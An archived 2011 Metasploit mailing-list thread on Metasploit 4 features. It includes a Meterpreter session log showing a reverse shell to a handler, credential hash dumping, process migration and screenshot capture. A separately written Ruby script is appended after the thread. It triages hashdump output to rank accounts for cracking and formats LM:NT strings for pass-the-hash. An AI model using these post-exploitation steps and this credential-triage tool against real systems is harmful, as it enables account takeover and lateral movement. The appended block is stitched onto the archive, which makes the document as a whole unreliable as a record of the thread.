Metasploit mailing list archives

Re: News from Metasploit 4.


From: Richard Miles <richard.k.miles () googlemail com>
Date: Sat, 27 Aug 2011 16:40:11 -0500

Hi Carlos,

Thanks for the heads-up. But do you know why, every time I call
screenshot or screengrab, the lynx browser is launched? Is there a way to
disable it?

run migrate -f crashes here, so I have to use run
post/windows/manage/migrate, but the old process name is still in the
task manager list even after the migration has completed. Is there any way to ask
run post/windows/manage/migrate to kill the old process?

Thanks

On Sat, Aug 27, 2011 at 4:02 PM, Carlos Perez
<dark0perator () pauldotcom com> wrote:
screenshot is now part of stdapi, so no need to load espia; migrate -f works fine for me

msf  exploit(handler) >
[*] Sending stage (752128 bytes) to 192.168.1.115
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.115:1572) at 2011-08-27 17:00:17 -0400
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.115:1572) processing AutoRunScript 'multi_console_command -rc /tmp/sample.rc'
[*] Running Command List ...
[*]     Running command sysinfo
Computer        : CARLOS-192FCD91
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
[*]     Running command getuid
Server username: CARLOS-192FCD91\Administrator
[*]     Running command load priv
[-] The 'priv' extension has already been loaded.
[*]     Running command hashdump
Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392:::
HR:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e:::
[*]     Running command run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a VMware Virtual Machine
[*]     Running command run migrate -f
[*] Current server process: meter_mac1.exe (2752)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 2896
[*] New server process: notepad.exe (2896)
[*]     Running command screenshot
Screenshot saved to: /Users/carlos/Development/msf4/nGRCugLJ.jpeg

msf  exploit(handler) > cat /tmp/sample.rc
[*] exec: cat /tmp/sample.rc

sysinfo
getuid
load priv
hashdump
run checkvm
run migrate -f
screenshot
msf  exploit(handler) >

On Aug 27, 2011, at 2:36 PM, Richard Miles wrote:

Hi Carlos

I know you are the creator of these resources, and I have tested the
multi_console_command script and now the module
post/multi/gather/run_console_rc_file, but they have never worked for me.
Maybe I'm doing something wrong.

I tried calling both of them before and after calling "use
exploit/multi/handler", and when I get the connection back from
meterpreter nothing happens: the commands are never executed, or at
least the output is never displayed on the screen.

I'm feeling very foul. Is there a chance you could show, step by step,
how you do it?

I tested both now again with metasploit 4.

Thanks.


On Fri, Aug 26, 2011 at 4:12 PM, Carlos Perez
<dark0perator () pauldotcom com> wrote:
AutoRunScript is for Meterpreter scripts/post modules; what you are showing would be considered a resource file.
Look at the multi_console_command script or the post module post/multi/gather/run_console_rc_file to achieve what
you want, and pass that resource file as an option.

On Aug 26, 2011, at 4:10 PM, Richard Miles wrote:

Hi Egypt,

It's awesome, thanks for the information. Also, do you have a working
version for 64 bits?

Any follow-up on the other 2 questions in the e-mail?

Thanks

On Fri, Aug 26, 2011 at 9:20 AM,  <egypt () metasploit com> wrote:
Yes, reverse_http(s) both use the WinInet API, and as such, use IE's
proxy configuration, including credentials.

egypt

On Fri, Aug 26, 2011 at 2:28 AM, Richard Miles
<richard.k.miles () googlemail com> wrote:
Hey Patrick,

Awesome, with the new reverse_http or reverse_https? Metasploit 4?

Thanks

On Thu, Aug 25, 2011 at 7:37 PM, Patrick Webster <patrick () aushack com> wrote:
Hey Richard,

I cannot guarantee 100%, but re: point #1, I successfully used
the stager to get around proxies with auth about 2 months ago.

-Patrick

On Fri, Aug 26, 2011 at 8:42 AM, Richard Miles
<richard.k.miles () googlemail com> wrote:
Hi

A friend of mine was talking about some great improvements in
Metasploit 4. I checked the blog, and it talks very briefly about them;
what most caught my attention is that reverse_http and reverse_https
were updated, and meterpreter scripts / resources too.

I have 3 questions...

1 - Are the new reverse_http and reverse_https now as good as PassiveX
was? I mean, can we use them completely over HTTP or HTTPS (even the
stager), and is the payload smart enough to get the proxy IP and port from
the browser and re-use the same credentials (in case the proxy requires
auth)?

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework








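The hashdump output in Carlos's session above says more than it looks like before anything is cracked: an LM field of aad3b435b51404eeaad3b435b51404ee means no LM hash is stored at all (NoLMHash policy or a password longer than 14 characters), an LM hash whose second half is aad3b435b51404ee means the password is 7 characters or fewer, and an NT field of 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty string. The following Ruby script is an added example, not code from the thread or from Metasploit, that applies those checks to hashdump's `user:RID:LM:NT:::` lines, orders the accounts by how cheaply they will yield, and emits the `LM:NT` string that Metasploit's SMB modules accept in SMBPass for pass-the-hash. The sample dump is constructed, modelled on the session above rather than copied from it; the Administrator pair is the well-known LM/NT hash of the password "password", the other hex strings are arbitrary.

```ruby
# Added example, not part of the thread or of Metasploit: triage of
# Meterpreter `hashdump` output before cracking or pass-the-hash.
#
# hashdump prints one account per line as  user:RID:LMHASH:NTHASH:::
# Two well-known constants let us read a lot from the hashes without cracking:
EMPTY_LM_HALF = 'aad3b435b51404ee'                 # LM hash of an empty 7-byte half
EMPTY_LM      = EMPTY_LM_HALF * 2                  # "no LM hash stored" marker
BLANK_NT      = '31d6cfe0d16ae931b73c59d7e0c089c0' # NT hash of the empty string

HASH_LINE = /\A([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::\z/i

HashEntry = Struct.new(:user, :rid, :lm, :nt, :flags) do
  # Credential in the LM:NT form that Metasploit's SMB modules accept in SMBPass.
  def pth_credential
    "#{lm}:#{nt}"
  end
end

# Derive what the hash pair tells us about the password and the account.
def classify(rid, lm, nt)
  flags = []
  flags << :builtin_admin  if rid == 500      # RID 500 is the built-in Administrator, whatever its name
  flags << :blank_password if nt == BLANK_NT
  if lm == EMPTY_LM
    flags << :lm_disabled                     # NoLMHash policy, or password longer than 14 chars
  elsif lm[16, 16] == EMPTY_LM_HALF
    flags << :short_password                  # second LM half empty: password is 7 chars or fewer
  else
    flags << :lm_present                      # full LM hash: both halves are cheap to crack
  end
  flags
end

# Parse hashdump output, skipping console chatter such as "[*] ..." lines.
def parse_hashdump(text)
  entries = []
  text.each_line do |raw|
    m = HASH_LINE.match(raw.strip)
    next unless m
    user, rid, lm, nt = m[1], m[2].to_i, m[3].downcase, m[4].downcase
    entries << HashEntry.new(user, rid, lm, nt, classify(rid, lm, nt))
  end
  entries
end

# Order accounts by how quickly they will yield: blank first, then LM-weak ones.
PRIORITY = { blank_password: 0, short_password: 1, lm_present: 2, lm_disabled: 3 }.freeze

def crack_order(entries)
  entries.sort_by { |e| [e.flags.map { |f| PRIORITY.fetch(f, 9) }.min, e.rid] }.map(&:user)
end

# Constructed sample modelled on the session in the thread; not the thread's own data.
# Administrator's pair is the well-known LM/NT hash of the password "password".
SAMPLE_HASHDUMP = <<~DUMP
  [*]     Running command hashdump
  Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
  Guest:501:#{EMPTY_LM}:#{BLANK_NT}:::
  HR:1003:0123456789abcdef#{EMPTY_LM_HALF}:fedcba9876543210fedcba9876543210:::
  SUPPORT_388945a0:1002:#{EMPTY_LM}:00112233445566778899aabbccddeeff:::
DUMP

if __FILE__ == $PROGRAM_NAME
  entries = parse_hashdump(SAMPLE_HASHDUMP)
  entries.each do |e|
    puts format('%-18s rid=%-4d %-30s %s', e.user, e.rid, e.flags.join(','), e.pth_credential)
  end
  puts "crack order: #{crack_order(entries).join(' > ')}"
end
```

With the sample above, Guest sorts first (blank password), then HR (short LM half), then Administrator (full LM hash), and SUPPORT_388945a0 last since only its NT hash is available. The regex deliberately rejects anything that is not exactly a hashdump record, so the console lines that a resource file run mixes into the output are dropped rather than misparsed.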
